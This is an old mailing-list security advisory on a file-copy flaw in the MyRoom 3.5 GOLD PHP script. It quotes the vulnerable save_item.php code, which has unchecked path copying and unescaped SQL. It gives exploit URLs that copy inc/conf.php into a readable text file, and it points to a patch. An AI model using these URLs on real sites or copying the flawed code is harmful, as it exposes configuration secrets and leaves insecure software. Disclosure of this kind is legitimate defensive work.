Informations : °°°°°°°°°°°°°° Website : http://www.plansbiz.net Version : 3.5 GOLD Problems : File copy/upload PHP Code/Location : °°°°°°°°°°°°°°°°°°° room/save_item.php : ------------------------------------------------------------------------ if($name == "" OR $ref == ""){ echo "You are fogot enter your 'ITEM NAME' or 'ITEM REF NO' !"; echo "<br>"; echo "<a href='$main_file?show=additem'>Try Agains [ Click Here ]</a>"; exit; } if($photo!="none" AND $photo!="application/octet-stream"){ //get type of file $filetype=$photo_type; //get lenght of image type $filelenght=strlen($filetype); //get part of file image to build image extension $pos=strpos($filetype,"/")+1; //build extension of image $fileextention=substr($filetype,$pos,$filelenght); if($fileextention=="pjpeg"){ $fileextention="jpg"; } $image=date("YmdHis"); $image.=".".$fileextention; $imgpath = "$imgroot"; //if image exist, upload it in correct dir if($photov<>"none") { if(!copy($photo,"$imgpath/$image")) { //display errors $msg="<br><font color='text00'>File Not Uploaded, it might be too large or does not exist..<br>Please Try Again!</font>"; break; } //or finish else { dbconnect(); $sql= "INSERT INTO room_item SET it_photo='$image', it_name='$name', it_decs='$decs', it_ab='$album', it_ref='$ref'"; mysql_query($sql) or die(mysql_error()); echo "<meta http-equiv='refresh' content='0;URL= $main_file?show=additem&m=1&i=$name'>"; echo "<br>Your File Was Uploaded Sucessful!! <br><br><a href='$main_file?show=additem&m=1&i=$name'>Loading ......</a>"; } } ------------------------------------------------------------------------ Exploits : °°°°°°°°°° http://[target]/room/save_item.php?name=[NAME]&ref=hacked&photo=../inc/conf.php&photo_type=ttxt + http://[target]/room/index.php?show=search&search=it_name&item=[NAME] to find the url of the txt file in wich is conf.php. Patch : °°°°°°° A patch can be found on http://www.phpsecure.info (english version available) . More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/MyRoom.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyRoom.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
This archive was generated by hypermail 2b30 : Wed Jan 22 2003 - 00:45:37 PST